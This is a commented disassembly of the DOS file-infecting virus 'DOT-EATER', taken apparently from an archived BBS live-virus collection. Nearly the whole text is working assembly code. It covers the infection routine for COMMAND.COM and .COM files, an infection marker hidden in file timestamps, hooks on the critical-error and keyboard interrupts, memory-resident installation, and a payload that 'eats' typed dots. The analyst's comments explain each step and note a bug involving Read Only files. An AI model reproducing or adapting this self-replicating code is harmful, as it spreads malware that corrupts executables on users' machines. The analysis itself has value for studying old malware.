home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
doteat-m.asm
< prev
next >
Wrap
Assembly Source File
|
1993-06-15
|
23KB
|
686 lines
; DOT-EATER
; Virus from Marek Filipiak collection
;
; dissasembly by Andrzej Kadlof 1990-09-13
;
; virus do not touch files with Read Only attribute!
0100 E9AD03 JMP 02C4 ; jump to virus code
; ....
; original program
;.....
; virus code
0200 E9EF00 JMP 02F2
;---------------------------
; main infection procedure
; intercepte INT 24h
0203 B82425 MOV AX,2524 ; set INT 24h (critical error handler)
0206 BA5204 MOV DX,0452
0209 CD21 INT 21
; set new DTA
020B B41A MOV AH,1A ; set DTA
020D BA5504 MOV DX,0455
0210 CD21 INT 21
0212 C6066A0400 MOV BYTE PTR [046A],00 ; clear attributes holder
0217 C7066F040000 MOV WORD PTR [046F],0000 ; clear file size holder
; the segment of enviroment is set to 0 only when COMMAND.COM is first time
; loaded!
021D 2E CS:
021E 833E2C0000 CMP WORD PTR [002C],+00 ; is evniroment?
0223 7405 JZ 022A ; absent
0225 E89102 CALL 04B9 ; locate COMMAND.COM and prepare for infection
0228 731F JAE 0249 ; found, infect it
022A B44E MOV AH,4E ; Find First
022C 33C9 XOR CX,CX ; file attributes
022E BA9B04 MOV DX,049B ; ASCIIZ filespec (*.COM)
0231 CD21 INT 21
0233 BF7304 MOV DI,0473 ; founded file name
0236 7303 JAE 023B ; file found
0238 EB6F JMP 02A9 ; no more files
023A 90 NOP
023B E8C102 CALL 04FF ; prepare for infection
023E 7309 JAE 0249 ; ready
0240 B44F MOV AH,4F ; Find Next
0242 CD21 INT 21
0244 73F5 JAE 023B ; file founded
0246 EB61 JMP 02A9 ; no more files
0248 90 NOP
; infect file
0249 51 PUSH CX
024A B8EF00 MOV AX,00EF ; automodify code
024D A30201 MOV [0101],AX
0250 B80057 MOV AX,5700 ; get time/date of file
0253 CD21 INT 21
0255 51 PUSH CX ; store file time
0256 52 PUSH DX ; store file date
0257 E8EE02 CALL 0548 ; move file pointer at the beginning
025A B43F MOV AH,3F ; Read File
025C B90300 MOV CX,0003 ; number of bytes
025F BAA104 MOV DX,04A1 ; to DS:DX
0262 CD21 INT 21
0264 B80242 MOV AX,4202 ; move file pointer to the end of file
0267 33C9 XOR CX,CX
0269 33D2 XOR DX,DX
026B CD21 INT 21
026D 050001 ADD AX,0100 ; file size + size of PSP = offset of virus
0270 A3E401 MOV [01E4],AX ; store in virus body
0273 A3C601 MOV [01C6],AX
0276 05C1FF ADD AX,FFC1 ; subtract 64
0279 A3A804 MOV [04A8],AX ; store virus entry point
027C B9B003 MOV CX,03B0 ; wirus length
027F BA0001 MOV DX,0100 ; from DS:DX
0282 B440 MOV AH,40 ; Write File
0284 CD21 INT 21
0286 E8BF02 CALL 0548 ; move file pointer at the beginning
0289 B440 MOV AH,40 ; Write File
028B B90300 MOV CX,0003 ; 3 bytes
028E BAA704 MOV DX,04A7 ; from DS:DX
0291 CD21 INT 21
; restore file time/date
0293 B80157 MOV AX,5701 ; set file time/date
0296 5A POP DX
0297 59 POP CX
0298 80C91F OR CL,1F ; set 62 seconds
029B CD21 INT 21
; restore file attributes
029D 59 POP CX
029E B80143 MOV AX,4301 ; set file attribute
02A1 87D7 XCHG DI,DX
02A3 CD21 INT 21
02A5 B43E MOV AH,3E ; Close File
02A7 CD21 INT 21
; restore INT 24h
02A9 B82425 MOV AX,2524 ; set INT 24h
02AC 2E CS:
02AD 8B161400 MOV DX,[0014]
02B1 1E PUSH DS
02B2 8EDA MOV DS,DX
02B4 2E CS:
02B5 8B161200 MOV DX,[0012]
02B9 CD21 INT 21
; restore DTA
02BB 1F POP DS
02BC B41A MOV AH,1A ; Set DTA
02BE BA8000 MOV DX,0080 ; in PSP
02C1 CD21 INT 21
02C3 C3 RET
;==========================
; wirus main entry point
;==========================
; move 64 bytes of virus code from CS:02D8 to the end of program segment
02C4 FC CLD
; here is patched offset of virus code in file
; ||
02C5 BE0002 MOV SI,0200 ; automodyfication point
02C8 81C6D800 ADD SI,00D8 ; find address of cs:02D8
02CC BF00FE MOV DI,FE00 ; destinantion
02CF B94000 MOV CX,0040 ; 64 bytes
02D2 57 PUSH DI ; return address (CS:FE00)
02D3 F3 REPZ ; move bytes
02D4 A4 MOVSB
02D5 58 POP AX ; get return address
02D6 FFE0 JMP AX ; jump to moved code (CS:01D8 here)
; move starting part (500h bytes) of infected file to CS:F900
02D8 BE0001 MOV SI,0100 ; beginning of mather file
02DB BF00F9 MOV DI,F900 ; destination
02DE B90005 MOV CX,0500 ; number of bytes
02E1 F3 REPZ
02E2 A4 MOVSB
; here is patched offset of virus code in file
; move virus code and some part of infected file at the begining of program
; image
; ||
02E3 BE0002 MOV SI,0200 ; automodyfication point
02E6 BF0001 MOV DI,0100 ; destination
02E9 B90005 MOV CX,0500
02EC 57 PUSH DI
02ED F3 REPZ
02EE A4 MOVSB
02EF 58 POP AX
02F0 FFE0 JMP AX ; jmp to CS:0100, moved virus code
;---------------------------------------------------------------------
; entry point after above jump (in CS:0100 if JMP 01F2)
; (remember that in real situation this code is moved 100h bytes below)
02F2 A0A104 MOV AL,[04A1] ; store on the stack first 3 bytes
02F5 50 PUSH AX ; of mather program (AH is inessential)
02F6 A1A204 MOV AX,[04A2]
02F9 50 PUSH AX
02FA E806FF CALL 0203 ; infect COMMAND.COM or something else
; restore oryginal 3 bytes of mather file in working area
02FD 58 POP AX
02FE A3A204 MOV [04A2],AX
0301 58 POP AX
0302 A2A104 MOV [04A1],AL
; check the presence of enviroment block
0305 2E CS:
0306 833E2C0000 CMP WORD PTR [002C],+00
030B 742E JZ 033B ; enviroment block is empty, make fun
; restore code of mather file
; move copying procedure in safe place
030D 50 PUSH AX
030E A1A204 MOV AX,[04A2] ; oryginal entry point of victim
0311 50 PUSH AX
0312 BE2102 MOV SI,0221 ; orgin
0315 BF00FE MOV DI,FE00 ; destination
0318 57 PUSH DI ; return address
0319 B94000 MOV CX,0040 ; 64 bytes
031C F3 REPZ
031D A4 MOVSB
031E 58 POP AX
031F FFE0 JMP AX ; jmp to moved code
; move oryginal code back to CS:0100
0321 BE00F9 MOV SI,F900
0324 BF0001 MOV DI,0100
0327 B90005 MOV CX,0500
032A F3 REPZ
032B A4 MOVSB
032C 58 POP AX
032D 2E CS:
032E A30101 MOV [0101],AX ; restore first 3 bytes
0331 58 POP AX
0332 2E CS:
0333 A20001 MOV [0100],AL
0336 B80001 MOV AX,0100
0339 FFE0 JMP AX ; go back to file
;-------------------------------------
; intercept INT 16h and stay resident
033B B89D01 MOV AX,019D
033E A30101 MOV [0101],AX
0341 B81625 MOV AX,2516 ; set INT 16h (Keyboard I/O)
0344 BAA503 MOV DX,02A5
0347 CD21 INT 21
; stay resident
0349 B8B004 MOV AX,04B0 ; virus length + PSP
034C BB1000 MOV BX,0010
034F 33D2 XOR DX,DX ; prepare division
0351 F7F3 DIV BX ; find number of paragraphs
0353 40 INC AX ; add 1 paragraph for safety (?)
0354 50 PUSH AX ; temporary storage
0355 40 INC AX ; one paragraph for MCB
0356 8CCB MOV BX,CS
0358 03C3 ADD AX,BX ; segment of new program location
035A 5B POP BX ; requested amount of memory
035B 50 PUSH AX
035C 50 PUSH AX
035D 06 PUSH ES
035E 8EC0 MOV ES,AX ; new segment
0360 33F6 XOR SI,SI ; sorce (PSP)
0362 33FF XOR DI,DI ; destination
0364 B90001 MOV CX,0100 ; size of moved block
0367 F3 REPZ
0368 A4 MOVSB
0369 07 POP ES
036A 051000 ADD AX,0010 ; size of PSP in paragraphs
036D A3AC04 MOV [04AC],AX ; segment for loaded file in EPB
0370 B44A MOV AH,4A ; modify allocated memory block
0372 CD21 INT 21
0374 BA8F04 MOV DX,048F ; ASCIIZ of loaded program
0377 BBAC04 MOV BX,04AC ; EXEC Parameter Block
037A B8034B MOV AX,4B03 ; Load Program Overlay
037D CD21 INT 21
; restore oryginal 3 bytes of loaded file
037F 07 POP ES
0380 A0A104 MOV AL,[04A1]
0383 26 ES:
0384 A20001 MOV [0100],AL
0387 A1A204 MOV AX,[04A2]
038A 26 ES:
038B A30101 MOV [0101],AX
038E 58 POP AX
038F 8CCB MOV BX,CS
0391 4B DEC BX ; segment of memory block
0392 A3AC04 MOV [04AC],AX ; segment of block owner
0395 8EDB MOV DS,BX
0397 A30100 MOV [0001],AX ; modify MCB
039A 8ED8 MOV DS,AX ; set registers
039C 8ED0 MOV SS,AX
039E 8EC0 MOV ES,AX
03A0 2E CS:
03A1 FF2EAA04 JMP FAR [04AA] ; jump to file (COMMAND.COM!)
;---------------------------------------
; new INT 16h handler (Keyboard I/O)
03A5 FB STI
03A6 1E PUSH DS
03A7 56 PUSH SI
03A8 0E PUSH CS
03A9 1F POP DS
03AA 33F6 XOR SI,SI
03AC 80FC01 CMP AH,01 ; is keystroke ready question?
03AF 7503 JNZ 03B4 ; no
03B1 BE0100 MOV SI,0001
03B4 9C PUSHF
03B5 FF1E8204 CALL FAR [0482] ; oryginal INT 16h
03B9 9C PUSHF
03BA 7431 JZ 03ED
03BC 83FE01 CMP SI,+01
03BF 752C JNZ 03ED
03C1 3C2E CMP AL,2E ; '.'
03C3 7418 JZ 03DD
03C5 3C5E CMP AL,5E ; '^'
03C7 7524 JNZ 03ED ; exit
; if keystroke is '^' then restore oryginal INT 16h (in ROM!)
03C9 1E PUSH DS
03CA 52 PUSH DX
03CB BA00F0 MOV DX,F000
03CE 8EDA MOV DS,DX
03D0 BA2EE8 MOV DX,E82E
03D3 B81625 MOV AX,2516 ; set INT 16h (Keyboard I/O)
03D6 CD21 INT 21
03D8 5A POP DX
03D9 07 POP ES
03DA EB11 JMP 03ED ; exit
03DC 90 NOP
03DD E81300 CALL 03F3 ; write dot and then eat it!
03E0 50 PUSH AX
03E1 B400 MOV AH,00
03E3 9C PUSHF
03E4 FF1E8204 CALL FAR [0482] ; do oryginal INT 16h
03E8 58 POP AX
03E9 9D POPF
03EA 32C0 XOR AL,AL
03EC 9C PUSHF
03ED 9D POPF
03EE 5E POP SI
03EF 1F POP DS
03F0 CA0200 RETF 0002 ; IRET
;---------------------------------------------------------------------------
; write dot (.) at cursor position, go to left end of the screen and eat it!
03F3 50 PUSH AX
03F4 53 PUSH BX
03F5 51 PUSH CX
03F6 52 PUSH DX
03F7 B403 MOV AH,03 ; read cursor position
03F9 B700 MOV BH,00
03FB CD10 INT 10
03FD FECA DEC DL
03FF 51 PUSH CX
0400 52 PUSH DX
0401 B82E0E MOV AX,0E2E ; write dot as TTY
0404 B307 MOV BL,07 ; foreground in graphic
0406 CD10 INT 10 ; video service
0408 B401 MOV AH,01 ; set cursor shape
040A B93030 MOV CX,3030 ; ??
040D CD10 INT 10
040F B14E MOV CL,4E ; 78 limit for column number
0411 8AD1 MOV DL,CL
0413 52 PUSH DX
0414 E86600 CALL 047D ; set cursor position
0417 E86A00 CALL 0484 ; write face character with sound efect
041A 51 PUSH CX
041B B90020 MOV CX,2000 ; time constant
041E 50 PUSH AX
041F 58 POP AX
0420 E2FC LOOP 041E ; delay
0422 59 POP CX
0423 58 POP AX
0424 8AD0 MOV DL,AL
0426 E85400 CALL 047D ; set cursor position
0429 E86900 CALL 0495 ; write space at cursor position
042C FEC9 DEC CL
042E 58 POP AX
042F 50 PUSH AX
0430 3AC8 CMP CL,AL
0432 75DD JNZ 0411
0434 FEC1 INC CL
0436 FEC1 INC CL
0438 51 PUSH CX
0439 B90001 MOV CX,0100 ; time constant
043C E85E00 CALL 049D ; make sound
043F 59 POP CX
0440 8AD1 MOV DL,CL ; column number
0442 52 PUSH DX ; store it
0443 E83700 CALL 047D ; set cursor position
0446 E83B00 CALL 0484 ; write face character with sound
0449 51 PUSH CX
044A B92000 MOV CX,0020 ; time constant
044D E84D00 CALL 049D ; make sound
0450 59 POP CX
0451 51 PUSH CX
0452 B90010 MOV CX,1000 ; delay connstant
0455 50 PUSH AX
0456 58 POP AX
0457 E2FC LOOP 0455 ; delay loop
0459 59 POP CX
045A 58 POP AX
045B 8AD0 MOV DL,AL
045D E81D00 CALL 047D ; set cursor position (DX)
0460 E83200 CALL 0495 ; write space at cursor position
0463 FEC1 INC CL ; next column
0465 80F94E CMP CL,4E ; 78?
0468 75D6 JNZ 0440 ; no
046A 5A POP DX
046B B401 MOV AH,01 ; set cursor shape
046D 59 POP CX
046E CD10 INT 10
0470 B402 MOV AH,02 ; set cursor position
0472 FEC2 INC DL
0474 B700 MOV BH,00
0476 CD10 INT 10
0478 5A POP DX
0479 59 POP CX
047A 5B POP BX
047B 58 POP AX
047C C3 RET
;-----------------------
; set cursor position
047D B402 MOV AH,02 ; set cursor position
047F B700 MOV BH,00
0481 CD10 INT 10
0483 C3 RET
;-----------------------------------------------------------
; write face character with sound efect in cursos position
0484 B40E MOV AH,0E ; write character as TTY subfunction
0486 B307 MOV BL,07 ; foregroung in graphic
0488 51 PUSH CX
0489 B94000 MOV CX,0040 ; time constant
048C E80E00 CALL 049D ; make sound
048F 59 POP CX
0490 B001 MOV AL,01 ; face character
0492 CD10 INT 10 ; eat dot!
0494 C3 RET
;---------------------------------
; write space in cursor position
0495 B8200E MOV AX,0E20 ; write space as TTY
0498 B307 MOV BL,07 ; foreground in graphic
049A CD10 INT 10
049C C3 RET
;---------------------
; sound procedure
049D 50 PUSH AX
049E E461 IN AL,61 ; get state of PPI
04A0 50 PUSH AX
04A1 8AE0 MOV AH,AL
04A3 80CC02 OR AH,02 ; speaker on
04A6 E661 OUT 61,AL
04A8 86E0 XCHG AL,AH
04AA 51 PUSH CX
04AB 50 PUSH AX
04AC 58 POP AX
04AD E2FC LOOP 04AB ; delay
04AF 59 POP CX
04B0 E2F4 LOOP 04A6
04B2 58 POP AX
04B3 24FC AND AL,FC ; speaker off
04B5 E661 OUT 61,AL
04B7 58 POP AX
04B8 C3 RET
;--------------------------------------------------------------------
; locate COMMAND.COM by finding COMSPEC= in enviroment and prepare it
; for infection (open, clear attributes, move file pointer at the
; beggining).
04B9 2E CS:
04BA A12C00 MOV AX,[002C] ; get enviroment
04BD BE8604 MOV SI,0486 ; adress of 'COMSPEC=' string
04C0 06 PUSH ES
04C1 8EC0 MOV ES,AX
04C3 33FF XOR DI,DI ; ES:DI start of enviroment block
04C5 8BDE MOV BX,SI ; [BX] = 'C'
04C7 26 ES:
04C8 804D00 CMP BYTE PTR [DI],00 ; is enviroment block empty?
04CB 7503 JNZ 04D0 ; no
04CD 07 POP ES
04CE F9 STC
04CF C3 RET
04D0 8A07 MOV AL,[BX] ; get letters
04D2 0AC0 OR AL,AL ; end of string?
04D4 7413 JZ 04E9 ; yes
04D6 26 ES:
04D7 3A05 CMP AL,[DI] ; compare with enviroment string
04D9 7504 JNZ 04DF ; not equal
04DB 43 INC BX ; get next letter
04DC 47 INC DI
04DD EBF1 JMP 04D0 ; continue search
04DF 32C0 XOR AL,AL ; look for the next string
04E1 B9FFFF MOV CX,FFFF ; size of block (maximum possible)
04E4 FC CLD
04E5 F2 REPNZ
04E6 AE SCASB ; look for 0
04E7 EBDC JMP 04C5
; COMSPEC= founded, DI points at path to COMMAND.COM, copy it to own buffer
04E9 BE7304 MOV SI,0473
04EC 26 ES:
04ED 8A05 MOV AL,[DI]
04EF 8804 MOV [SI],AL
04F1 46 INC SI
04F2 47 INC DI
04F3 0AC0 OR AL,AL
04F5 75F5 JNZ 04EC
04F7 07 POP ES
04F8 BF7304 MOV DI,0473
04FB E80100 CALL 04FF ; prepare file for infection
04FE C3 RET
;---------------------------
; prepare file for infection
04FF F6066A0404 TEST BYTE PTR [046A],04 ; System file?
0504 7402 JZ 0508 ; no
0506 F9 STC
0507 C3 RET
0508 813E6F0400F8 CMP WORD PTR [046F],F800 ; maximum length of file
050E 7602 JBE 0512
0510 F9 STC
0511 C3 RET
; Check is the file already infected (look at seconds in file time stamp).
; Here is logical bug. Virus is trying to open file in Read/Write mode
; before clearing flag Read Only. So files with this attribute are safe!
0512 B8023D MOV AX,3D02 ; Open File
0515 8BD7 MOV DX,DI
0517 CD21 INT 21
0519 7301 JAE 051C
051B C3 RET
051C 93 XCHG BX,AX ; store handle
051D B80057 MOV AX,5700 ; get file date/time
0520 CD21 INT 21
0522 80E11F AND CL,1F ; extract seconds
0525 80F91F CMP CL,1F ; = 62 ?
0528 7506 JNZ 0530 ; not infected yet
052A B43E MOV AH,3E ; Close File
052C CD21 INT 21
052E F9 STC
052F C3 RET
0530 B80043 MOV AX,4300 ; get file attributes
0533 8BD7 MOV DX,DI
0535 CD21 INT 21
0537 51 PUSH CX
0538 B80143 MOV AX,4301 ; set file attributes
053B 33C9 XOR CX,CX ; clear all atributes
053D CD21 INT 21
053F 59 POP CX
0540 7305 JAE 0547 ; RET
0542 B43E MOV AH,3E ; Close File
0544 CD21 INT 21
0546 F9 STC
0547 C3 RET
;-------------------------------------
; move file pointer at the beginning
0548 B80042 MOV AX,4200
054B 33C9 XOR CX,CX
054D 33D2 XOR DX,DX
054F CD21 INT 21
0551 C3 RET
;---------------------
; new INT 24 handler
0552 B003 MOV AL,03
0554 CF IRET
;------------------------------------------------------------------------
; virus working area, in active virus this area is moved 100h bytes down
; new DTA
0555 00 00 00 00 00 00 00 00 00 00 00 ; 21 bytes reserved by DOS
0560 00 00 00 00 00 00 00 00 00 00
056A 00 ; file attribute
056B 00 00 00 00 ; time and data stamps
056F 00 00 00 00 ; file size
0573 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ASCIIZ file name (13 bytes)
0580 00 00
0582 2E E8 00 F0 ; old INT 16h
0586 43 4F 4D 53 50 45 43 3D 00 ; COMSPEC=.
058F 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 ; COMMAND.COM, ASCIIZ of loaded file
059B 2A 2E 43 4F 4D ; *.COM
05A0 00
05A1 00 00 00 ; oryginal first 3 byte of next victim
05A3 00 00 00
05A7 E9 00 00 ; new 3 bytes for infected file
05AA 00 01 ; offset file entry point
; 4 bytes EPB (for AL = 3)
05AC 00 00 ; segment for loaded file
05AE 00 00 ; ignored